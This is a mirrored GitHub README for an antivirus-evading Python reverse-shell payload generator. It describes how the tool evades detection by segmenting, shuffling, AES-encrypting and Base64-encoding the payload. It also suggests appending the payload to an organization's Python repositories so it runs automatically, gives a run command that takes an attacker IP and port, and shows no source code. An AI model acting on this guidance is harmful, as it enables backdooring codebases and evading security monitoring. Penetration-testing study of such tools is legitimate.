Light

halbachb / dark-lord-obama Goto Github PK

View Code? Open in Web Editor NEW

This project forked from tanc7/dark-lord-obama

0.0 1.0 0.0 97 KB

AV-evading Pythonic Reverse Shell with Dynamic Adaption Capabilities

Python 100.00%

dark-lord-obama's Introduction

Dark Lord Obama - Undetectable Pythonic Payload Generator

Chang Tan Lister Lister Unlimited Cybersecurity Solutions, LLC. [email protected]

DLO generates a Pythonic reverse shell that as of July 29th, 2019, is undetectable on VirusTotal. It combines multiple won't-to-be-disclosed techniques (undiscloseable in detail) including but not limited to:

"Command Segmentation"
"AES Encryption" with a 32-bit key and a 16-bit initialization vector
Base64 Encoding - It was a necessity
Inline Python exec() functions, C asm() functions (will be added soon), Java/Jython, Cython, Ctypes

Dark Lord Obama Official Release Demo

Please click this link for a demostration video of how to use

Suggested Uses

Currently you can, after you gain a foothold in organization

Run the payload standalone.
Replace the proof-of-concept code with a Metasploit python payload
Taint/corrupt Python repositories: Locate the Python code repositories of a organization during a pentest and then copy-paste the entire code and append it to the bottom of the python module, guarantee auto-execution of the reverse shell when the code runs
Use the payload as a stager to download additional payloads
Use the payload against MacOS (MacBooks, iMacs, etc). They natively run Python 2.7.1

Run it as python darklordobama.py <attacker IP> <attacker listening port>

How does it work?

First it chops up your payload into two-character segments, "Command Segmentation)

A ArrayMap is produced to allow the payload to reconstitute itself

The payload is then shuffled into a list array and then encrypted with AES-128

The encrypted payload is encoded in Base64 format

dark-lord-obama's People

Watchers

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.